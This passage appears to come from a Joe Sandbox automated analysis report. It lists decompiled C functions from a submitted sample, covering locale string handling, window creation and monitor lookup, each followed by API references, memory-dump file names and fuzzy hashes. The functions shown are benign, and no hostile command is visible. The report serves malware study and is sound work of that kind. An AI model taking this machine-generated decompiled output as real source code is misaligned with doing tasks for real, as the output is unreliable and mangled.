                                                                                                                                                                                                                                                                                          											L26:
                                                                                                                                                                                                                                                                                          											__eflags =  *_t78;
                                                                                                                                                                                                                                                                                          											if( *_t78 != 0) {
                                                                                                                                                                                                                                                                                          												continue;
                                                                                                                                                                                                                                                                                          											}
                                                                                                                                                                                                                                                                                          											goto L27;
                                                                                                                                                                                                                                                                                          										}
                                                                                                                                                                                                                                                                                          										__eflags =  *_t78;
                                                                                                                                                                                                                                                                                          										if( *_t78 == 0) {
                                                                                                                                                                                                                                                                                          											goto L27;
                                                                                                                                                                                                                                                                                          										}
                                                                                                                                                                                                                                                                                          										_t78 = _t78 + 1;
                                                                                                                                                                                                                                                                                          										_t83 = _t83 + 1;
                                                                                                                                                                                                                                                                                          										__eflags = _t83;
                                                                                                                                                                                                                                                                                          										goto L26;
                                                                                                                                                                                                                                                                                          									} else {
                                                                                                                                                                                                                                                                                          										goto L19;
                                                                                                                                                                                                                                                                                          									}
                                                                                                                                                                                                                                                                                          									while(1) {
                                                                                                                                                                                                                                                                                          										L19:
                                                                                                                                                                                                                                                                                          										_t76 =  *_t68;
                                                                                                                                                                                                                                                                                          										__eflags = _t76;
                                                                                                                                                                                                                                                                                          										if(_t76 == 0) {
                                                                                                                                                                                                                                                                                          											goto L33;
                                                                                                                                                                                                                                                                                          										}
                                                                                                                                                                                                                                                                                          										__eflags =  *((intOrPtr*)(_t83 + _t68)) - _t76;
                                                                                                                                                                                                                                                                                          										if( *((intOrPtr*)(_t83 + _t68)) != _t76) {
                                                                                                                                                                                                                                                                                          											goto L22;
                                                                                                                                                                                                                                                                                          										}
                                                                                                                                                                                                                                                                                          										_t68 = _t68 + 1;
                                                                                                                                                                                                                                                                                          										__eflags =  *((char*)(_t83 + _t68));
                                                                                                                                                                                                                                                                                          										if( *((char*)(_t83 + _t68)) != 0) {
                                                                                                                                                                                                                                                                                          											continue;
                                                                                                                                                                                                                                                                                          										}
                                                                                                                                                                                                                                                                                          										goto L22;
                                                                                                                                                                                                                                                                                          									}
                                                                                                                                                                                                                                                                                          									goto L33;
                                                                                                                                                                                                                                                                                          								}
                                                                                                                                                                                                                                                                                          								goto L27;
                                                                                                                                                                                                                                                                                          							}
                                                                                                                                                                                                                                                                                          							 *((intOrPtr*)(E00107A0D(__eflags))) = 0x16;
                                                                                                                                                                                                                                                                                          							E001079BB();
                                                                                                                                                                                                                                                                                          							__eflags = _v8;
                                                                                                                                                                                                                                                                                          							if(_v8 != 0) {
                                                                                                                                                                                                                                                                                          								_t52 = _v12;
                                                                                                                                                                                                                                                                                          								_t24 = _t52 + 0x70;
                                                                                                                                                                                                                                                                                          								 *_t24 =  *(_t52 + 0x70) & 0xfffffffd;
                                                                                                                                                                                                                                                                                          								__eflags =  *_t24;
                                                                                                                                                                                                                                                                                          							}
                                                                                                                                                                                                                                                                                          							_t47 = 0;
                                                                                                                                                                                                                                                                                          							goto L31;
                                                                                                                                                                                                                                                                                          						}
                                                                                                                                                                                                                                                                                          						__eflags = _v8;
                                                                                                                                                                                                                                                                                          						if(_v8 != 0) {
                                                                                                                                                                                                                                                                                          							_t54 = _v12;
                                                                                                                                                                                                                                                                                          							_t18 = _t54 + 0x70;
                                                                                                                                                                                                                                                                                          							 *_t18 =  *(_t54 + 0x70) & 0xfffffffd;
                                                                                                                                                                                                                                                                                          							__eflags =  *_t18;
                                                                                                                                                                                                                                                                                          						}
                                                                                                                                                                                                                                                                                          						return _a4;
                                                                                                                                                                                                                                                                                          					} else {
                                                                                                                                                                                                                                                                                          						 *((intOrPtr*)(E00107A0D(__eflags))) = 0x16;
                                                                                                                                                                                                                                                                                          						E001079BB();
                                                                                                                                                                                                                                                                                          						__eflags = _v8;
                                                                                                                                                                                                                                                                                          						if(_v8 != 0) {
                                                                                                                                                                                                                                                                                          							_t58 = _v12;
                                                                                                                                                                                                                                                                                          							_t14 = _t58 + 0x70;
                                                                                                                                                                                                                                                                                          							 *_t14 =  *(_t58 + 0x70) & 0xfffffffd;
                                                                                                                                                                                                                                                                                          							__eflags =  *_t14;
                                                                                                                                                                                                                                                                                          						}
                                                                                                                                                                                                                                                                                          						__eflags = 0;
                                                                                                                                                                                                                                                                                          						return 0;
                                                                                                                                                                                                                                                                                          					}
                                                                                                                                                                                                                                                                                          				} else {
                                                                                                                                                                                                                                                                                          					_t59 = E00108A00(_a4, _a8);
                                                                                                                                                                                                                                                                                          					if(_v8 == 0) {
                                                                                                                                                                                                                                                                                          						return _t59;
                                                                                                                                                                                                                                                                                          					} else {
                                                                                                                                                                                                                                                                                          						 *(_v12 + 0x70) =  *(_v12 + 0x70) & 0xfffffffd;
                                                                                                                                                                                                                                                                                          						return _t59;
                                                                                                                                                                                                                                                                                          					}
                                                                                                                                                                                                                                                                                          				}
                                                                                                                                                                                                                                                                                          			}

























                                                                                                                                                                                                                                                                                          0x00105fa9
                                                                                                                                                                                                                                                                                          0x00105fb5
                                                                                                                                                                                                                                                                                          0x00105fd7
                                                                                                                                                                                                                                                                                          0x00105fda
                                                                                                                                                                                                                                                                                          0x00105fdc
                                                                                                                                                                                                                                                                                          0x00105fff
                                                                                                                                                                                                                                                                                          0x00106002
                                                                                                                                                                                                                                                                                          0x00106017
                                                                                                                                                                                                                                                                                          0x0010601a
                                                                                                                                                                                                                                                                                          0x0010601c
                                                                                                                                                                                                                                                                                          0x0010603f
                                                                                                                                                                                                                                                                                          0x00106040
                                                                                                                                                                                                                                                                                          0x00106042
                                                                                                                                                                                                                                                                                          0x00106044
                                                                                                                                                                                                                                                                                          0x00106054
                                                                                                                                                                                                                                                                                          0x00106056
                                                                                                                                                                                                                                                                                          0x0010605a
                                                                                                                                                                                                                                                                                          0x001060a0
                                                                                                                                                                                                                                                                                          0x001060a0
                                                                                                                                                                                                                                                                                          0x001060a4
                                                                                                                                                                                                                                                                                          0x001060a6
                                                                                                                                                                                                                                                                                          0x001060a9
                                                                                                                                                                                                                                                                                          0x001060a9
                                                                                                                                                                                                                                                                                          0x001060a9
                                                                                                                                                                                                                                                                                          0x001060a9
                                                                                                                                                                                                                                                                                          0x001060ad
                                                                                                                                                                                                                                                                                          0x001060ad
                                                                                                                                                                                                                                                                                          0x001060af
                                                                                                                                                                                                                                                                                          0x001060b1
                                                                                                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                                                                                                          0x001060b1
                                                                                                                                                                                                                                                                                          0x0010605c
                                                                                                                                                                                                                                                                                          0x0010605c
                                                                                                                                                                                                                                                                                          0x0010605f
                                                                                                                                                                                                                                                                                          0x0010605f
                                                                                                                                                                                                                                                                                          0x00106061
                                                                                                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                                                                                                          0x00106063
                                                                                                                                                                                                                                                                                          0x00106065
                                                                                                                                                                                                                                                                                          0x00106068
                                                                                                                                                                                                                                                                                          0x0010606a
                                                                                                                                                                                                                                                                                          0x0010607e
                                                                                                                                                                                                                                                                                          0x0010607e
                                                                                                                                                                                                                                                                                          0x00106081
                                                                                                                                                                                                                                                                                          0x001060b4
                                                                                                                                                                                                                                                                                          0x001060b4
                                                                                                                                                                                                                                                                                          0x001060b8
                                                                                                                                                                                                                                                                                          0x001060ba
                                                                                                                                                                                                                                                                                          0x001060bd
                                                                                                                                                                                                                                                                                          0x001060bd
                                                                                                                                                                                                                                                                                          0x001060bd
                                                                                                                                                                                                                                                                                          0x001060bd
                                                                                                                                                                                                                                                                                          0x001060c1
                                                                                                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                                                                                                          0x001060c1
                                                                                                                                                                                                                                                                                          0x00106083
                                                                                                                                                                                                                                                                                          0x00106086
                                                                                                                                                                                                                                                                                          0x0010608d
                                                                                                                                                                                                                                                                                          0x0010608e
                                                                                                                                                                                                                                                                                          0x0010608f
                                                                                                                                                                                                                                                                                          0x00106092
                                                                                                                                                                                                                                                                                          0x0010609b
                                                                                                                                                                                                                                                                                          0x0010609b
                                                                                                                                                                                                                                                                                          0x0010609e
                                                                                                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                                                                                                          0x0010609e
                                                                                                                                                                                                                                                                                          0x00106094
                                                                                                                                                                                                                                                                                          0x00106097
                                                                                                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                                                                                                          0x00106099
                                                                                                                                                                                                                                                                                          0x0010609a
                                                                                                                                                                                                                                                                                          0x0010609a
                                                                                                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                                                                                                          0x0010606c
                                                                                                                                                                                                                                                                                          0x0010606c
                                                                                                                                                                                                                                                                                          0x0010606c
                                                                                                                                                                                                                                                                                          0x0010606e
                                                                                                                                                                                                                                                                                          0x00106070
                                                                                                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                                                                                                          0x00106072
                                                                                                                                                                                                                                                                                          0x00106075
                                                                                                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                                                                                                          0x00106077
                                                                                                                                                                                                                                                                                          0x00106078
                                                                                                                                                                                                                                                                                          0x0010607c
                                                                                                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                                                                                                          0x0010607c
                                                                                                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                                                                                                          0x0010606c
                                                                                                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                                                                                                          0x0010605f
                                                                                                                                                                                                                                                                                          0x00106023
                                                                                                                                                                                                                                                                                          0x00106029
                                                                                                                                                                                                                                                                                          0x0010602e
                                                                                                                                                                                                                                                                                          0x00106032
                                                                                                                                                                                                                                                                                          0x00106034
                                                                                                                                                                                                                                                                                          0x00106037
                                                                                                                                                                                                                                                                                          0x00106037
                                                                                                                                                                                                                                                                                          0x00106037
                                                                                                                                                                                                                                                                                          0x00106037
                                                                                                                                                                                                                                                                                          0x0010603b
                                                                                                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                                                                                                          0x0010603b
                                                                                                                                                                                                                                                                                          0x00106004
                                                                                                                                                                                                                                                                                          0x00106008
                                                                                                                                                                                                                                                                                          0x0010600a
                                                                                                                                                                                                                                                                                          0x0010600d
                                                                                                                                                                                                                                                                                          0x0010600d
                                                                                                                                                                                                                                                                                          0x0010600d
                                                                                                                                                                                                                                                                                          0x0010600d
                                                                                                                                                                                                                                                                                          0x00106015
                                                                                                                                                                                                                                                                                          0x00105fde
                                                                                                                                                                                                                                                                                          0x00105fe3
                                                                                                                                                                                                                                                                                          0x00105fe9
                                                                                                                                                                                                                                                                                          0x00105fee
                                                                                                                                                                                                                                                                                          0x00105ff2
                                                                                                                                                                                                                                                                                          0x00105ff4
                                                                                                                                                                                                                                                                                          0x00105ff7
                                                                                                                                                                                                                                                                                          0x00105ff7
                                                                                                                                                                                                                                                                                          0x00105ff7
                                                                                                                                                                                                                                                                                          0x00105ff7
                                                                                                                                                                                                                                                                                          0x00105ffb
                                                                                                                                                                                                                                                                                          0x00105ffe
                                                                                                                                                                                                                                                                                          0x00105ffe
                                                                                                                                                                                                                                                                                          0x00105fb7
                                                                                                                                                                                                                                                                                          0x00105fbd
                                                                                                                                                                                                                                                                                          0x00105fc8
                                                                                                                                                                                                                                                                                          0x001060b3
                                                                                                                                                                                                                                                                                          0x00105fce
                                                                                                                                                                                                                                                                                          0x00105fd1
                                                                                                                                                                                                                                                                                          0x00105fd6
                                                                                                                                                                                                                                                                                          0x00105fd6
                                                                                                                                                                                                                                                                                          0x00105fc8

                                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                                          • _LocaleUpdate::_LocaleUpdate.LIBCMT ref: 00105FA9
                                                                                                                                                                                                                                                                                            • Part of subcall function 001059F5: __getptd.LIBCMT ref: 00105A08
                                                                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                                          • Source File: 00000000.00000002.711567392.00000000000F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000F0000, based on PE: true
                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.711475414.00000000000F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.712120214.0000000000110000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.712120214.0000000000120000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.712610122.0000000000159000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.712714995.000000000015C000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.713013679.0000000000170000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.713099356.0000000000173000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_f0000_fs7AQcREFX.jbxd
                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                          • API ID: Locale$UpdateUpdate::___getptd
                                                                                                                                                                                                                                                                                          • String ID: >*
                                                                                                                                                                                                                                                                                          • API String ID: 3914705266-2119124535
                                                                                                                                                                                                                                                                                          • Opcode ID: 79ff44a6565b4d8c7df63caba67225e6508255aa534951af918f1b7c4bcf80d8
                                                                                                                                                                                                                                                                                          • Instruction ID: b85cf8e5ad25796d986196bf4552ae9f336767e32aa83c3aea629f7c92565a73
                                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 79ff44a6565b4d8c7df63caba67225e6508255aa534951af918f1b7c4bcf80d8
                                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 6541A531944285AFEF269B78C4457AD7FA0AF01364F2842C8F4E15B1EAD7F59DA2C780
                                                                                                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                                            • Part of subcall function 000F3340: lstrlenA.KERNEL32(?,1F9A9BDF,?,00000000,00000000), ref: 000F338F
                                                                                                                                                                                                                                                                                            • Part of subcall function 000F3340: CoTaskMemFree.OLE32(00000000,?,1F9A9BDF,?,00000000,00000000), ref: 000F33D0
                                                                                                                                                                                                                                                                                          • lstrcmpiA.KERNEL32(?,?,00000000), ref: 000F36CF
                                                                                                                                                                                                                                                                                          • CoTaskMemFree.OLE32(00000000), ref: 000F3755
                                                                                                                                                                                                                                                                                          • CharNextA.USER32(00000000,0000007B,00000000,00000000,00000000,?,00000000), ref: 000F37A2
                                                                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                                          • Source File: 00000000.00000002.711567392.00000000000F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000F0000, based on PE: true
                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.711475414.00000000000F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.712120214.0000000000110000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.712120214.0000000000120000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.712610122.0000000000159000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.712714995.000000000015C000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.713013679.0000000000170000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.713099356.0000000000173000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_f0000_fs7AQcREFX.jbxd
                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                          • API ID: FreeTask$CharNextlstrcmpilstrlen
                                                                                                                                                                                                                                                                                          • String ID: {
                                                                                                                                                                                                                                                                                          • API String ID: 3294900980-366298937
                                                                                                                                                                                                                                                                                          • Opcode ID: 179a55403d82c4b9dc37e85eaf46d8e7d419e549713e66ea93c17d33a423ce34
                                                                                                                                                                                                                                                                                          • Instruction ID: 6a1d6a86d93f2b3114753d831b9697a60faef629565abb088ee9a72e55bec3a3
                                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 179a55403d82c4b9dc37e85eaf46d8e7d419e549713e66ea93c17d33a423ce34
                                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 0841D7F590826D9BD736AB54CC807FEB7E4AB08721F104199E745DB641D770AF809BA0
                                                                                                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                                          • MonitorFromPoint.USER32(?,?,00000000), ref: 00101BEB
                                                                                                                                                                                                                                                                                          • MonitorFromPoint.USER32(?,?,00000002), ref: 00101BF5
                                                                                                                                                                                                                                                                                          • GetMonitorInfoA.USER32 ref: 00101C24
                                                                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                                          • Source File: 00000000.00000002.711567392.00000000000F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000F0000, based on PE: true
                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.711475414.00000000000F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.712120214.0000000000110000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.712120214.0000000000120000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.712610122.0000000000159000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.712714995.000000000015C000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.713013679.0000000000170000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.713099356.0000000000173000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_f0000_fs7AQcREFX.jbxd
                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                          • API ID: Monitor$FromPoint$Info
                                                                                                                                                                                                                                                                                          • String ID: (
                                                                                                                                                                                                                                                                                          • API String ID: 1942056148-3887548279
                                                                                                                                                                                                                                                                                          • Opcode ID: 2d922f945379630bf0ba59cbd92dabfb5834a830c1174c6053e1575ee688d112
                                                                                                                                                                                                                                                                                          • Instruction ID: f66ce08f0f54cb5f7e3e64522d263de6807d11410d647f38ab7a78bea49fff79
                                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 2d922f945379630bf0ba59cbd92dabfb5834a830c1174c6053e1575ee688d112
                                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 9011CC70E45209ABDB18DFA99945AEEBBB8AB08300F50816EE455F6380D7749A408B68
                                                                                                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                                          C-Code - Quality: 100%
                                                                                                                                                                                                                                                                                          			E000FD050(struct HWND__* __ecx) {
                                                                                                                                                                                                                                                                                          				int _v8;
                                                                                                                                                                                                                                                                                          				int _v12;
                                                                                                                                                                                                                                                                                          				void* _v16;
                                                                                                                                                                                                                                                                                          				struct HWND__* _t8;
                                                                                                                                                                                                                                                                                          				struct HWND__* _t15;
                                                                                                                                                                                                                                                                                          
                                                                                                                                                                                                                                                                                          				_t15 = CreateWindowExA(0, "ReBarWindow32", 0, 0x56002640, 0, 0, 0x64, 0x64, __ecx, 0xe800,  *0x170c08, 0);
                                                                                                                                                                                                                                                                                          				_t8 = 0;
                                                                                                                                                                                                                                                                                          				if(_t15 == 0) {
                                                                                                                                                                                                                                                                                          					L4:
                                                                                                                                                                                                                                                                                          					return _t8;
                                                                                                                                                                                                                                                                                          				} else {
                                                                                                                                                                                                                                                                                          					_v12 = 0;
                                                                                                                                                                                                                                                                                          					_v8 = 0;
                                                                                                                                                                                                                                                                                          					_v16 = 0xc;
                                                                                                                                                                                                                                                                                          					_v12 = 0;
                                                                                                                                                                                                                                                                                          					if(SendMessageA(_t15, 0x404, 0,  &_v16) != 0) {
                                                                                                                                                                                                                                                                                          						_t8 = _t15;
                                                                                                                                                                                                                                                                                          						goto L4;
                                                                                                                                                                                                                                                                                          					} else {
                                                                                                                                                                                                                                                                                          						DestroyWindow(_t15);
                                                                                                                                                                                                                                                                                          						return 0;
                                                                                                                                                                                                                                                                                          					}
                                                                                                                                                                                                                                                                                          				}
                                                                                                                                                                                                                                                                                          			}








                                                                                                                                                                                                                                                                                          0x000fd081
                                                                                                                                                                                                                                                                                          0x000fd083
                                                                                                                                                                                                                                                                                          0x000fd087
                                                                                                                                                                                                                                                                                          0x000fd0be
                                                                                                                                                                                                                                                                                          0x000fd0c2
                                                                                                                                                                                                                                                                                          0x000fd089
                                                                                                                                                                                                                                                                                          0x000fd093
                                                                                                                                                                                                                                                                                          0x000fd097
                                                                                                                                                                                                                                                                                          0x000fd09a
                                                                                                                                                                                                                                                                                          0x000fd0a1
                                                                                                                                                                                                                                                                                          0x000fd0ac
                                                                                                                                                                                                                                                                                          0x000fd0bc
                                                                                                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                                                                                                          0x000fd0ae
                                                                                                                                                                                                                                                                                          0x000fd0af
                                                                                                                                                                                                                                                                                          0x000fd0bb
                                                                                                                                                                                                                                                                                          0x000fd0bb
                                                                                                                                                                                                                                                                                          0x000fd0ac

                                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                                          • CreateWindowExA.USER32 ref: 000FD07B
                                                                                                                                                                                                                                                                                          • SendMessageA.USER32(00000000,00000404,00000000,000F7DAA), ref: 000FD0A4
                                                                                                                                                                                                                                                                                          • DestroyWindow.USER32(00000000), ref: 000FD0AF
                                                                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                                          • Source File: 00000000.00000002.711567392.00000000000F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000F0000, based on PE: true
                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.711475414.00000000000F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.712120214.0000000000110000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.712120214.0000000000120000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.712610122.0000000000159000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.712714995.000000000015C000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.713013679.0000000000170000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.713099356.0000000000173000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_f0000_fs7AQcREFX.jbxd
                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                          • API ID: Window$CreateDestroyMessageSend
                                                                                                                                                                                                                                                                                          • String ID: ReBarWindow32
                                                                                                                                                                                                                                                                                          • API String ID: 238161798-2848004845
                                                                                                                                                                                                                                                                                          • Opcode ID: ef13673f7216706ed59d03a70385a047cf5918451bc92e16e0a1a4f71e54fda3
                                                                                                                                                                                                                                                                                          • Instruction ID: d3efa77bf46f5fc2833e0b0ce90e6b025bff96dd62dd55c93b4faca4214cacb7
                                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: ef13673f7216706ed59d03a70385a047cf5918451bc92e16e0a1a4f71e54fda3
                                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: E6F08171B54318BBE7209BA89C06FAA7BA8DB44B01F108156FB08FA680EAF058408795
                                                                                                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                                          C-Code - Quality: 100%
                                                                                                                                                                                                                                                                                          			E000FFAB0() {
                                                                                                                                                                                                                                                                                          				intOrPtr _t1;
                                                                                                                                                                                                                                                                                          				intOrPtr _t2;
                                                                                                                                                                                                                                                                                          				intOrPtr _t4;
                                                                                                                                                                                                                                                                                          				struct _CRITICAL_SECTION* _t5;
                                                                                                                                                                                                                                                                                          
                                                                                                                                                                                                                                                                                          				_t1 =  *0x1719a4; // 0x0
                                                                                                                                                                                                                                                                                          				if(_t1 == 0) {
                                                                                                                                                                                                                                                                                          					_t4 =  *0x17196c; // 0x1719bc
                                                                                                                                                                                                                                                                                          					_t5 = _t4 + 0x10;
                                                                                                                                                                                                                                                                                          					EnterCriticalSection(_t5);
                                                                                                                                                                                                                                                                                          					if( *0x1719a4 == 0) {
                                                                                                                                                                                                                                                                                          						 *0x1719a4 = RegisterWindowMessageA("WTL_CmdBar_InternalAutoPopupMsg");
                                                                                                                                                                                                                                                                                          					}
                                                                                                                                                                                                                                                                                          					LeaveCriticalSection(_t5);
                                                                                                                                                                                                                                                                                          					_t2 =  *0x1719a4; // 0x0
                                                                                                                                                                                                                                                                                          					return _t2;
                                                                                                                                                                                                                                                                                          				}
                                                                                                                                                                                                                                                                                          				return _t1;
                                                                                                                                                                                                                                                                                          			}







                                                                                                                                                                                                                                                                                          0x000ffab0
                                                                                                                                                                                                                                                                                          0x000ffab8
                                                                                                                                                                                                                                                                                          0x000ffaba
                                                                                                                                                                                                                                                                                          0x000ffac0
                                                                                                                                                                                                                                                                                          0x000ffac4
                                                                                                                                                                                                                                                                                          0x000ffad1
                                                                                                                                                                                                                                                                                          0x000ffade
                                                                                                                                                                                                                                                                                          0x000ffade
                                                                                                                                                                                                                                                                                          0x000ffae4
                                                                                                                                                                                                                                                                                          0x000ffaea
                                                                                                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                                                                                                          0x000ffaea
                                                                                                                                                                                                                                                                                          0x000ffaf0

                                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                                          • EnterCriticalSection.KERNEL32(001719AC,?,000FC31F), ref: 000FFAC4
                                                                                                                                                                                                                                                                                          • RegisterWindowMessageA.USER32(WTL_CmdBar_InternalAutoPopupMsg), ref: 000FFAD8
                                                                                                                                                                                                                                                                                          • LeaveCriticalSection.KERNEL32(001719AC), ref: 000FFAE4
                                                                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                                                                          • WTL_CmdBar_InternalAutoPopupMsg, xrefs: 000FFAD3
                                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                                          • Source File: 00000000.00000002.711567392.00000000000F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000F0000, based on PE: true
                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.711475414.00000000000F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.712120214.0000000000110000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.712120214.0000000000120000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.712610122.0000000000159000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.712714995.000000000015C000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.713013679.0000000000170000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.713099356.0000000000173000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_f0000_fs7AQcREFX.jbxd
                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                          • API ID: CriticalSection$EnterLeaveMessageRegisterWindow
                                                                                                                                                                                                                                                                                          • String ID: WTL_CmdBar_InternalAutoPopupMsg
                                                                                                                                                                                                                                                                                          • API String ID: 6923546-631010736
                                                                                                                                                                                                                                                                                          • Opcode ID: 15015354eaba06c8285cebec87d7585f8e916efe4fcf6e365cde459ddbf30ac4
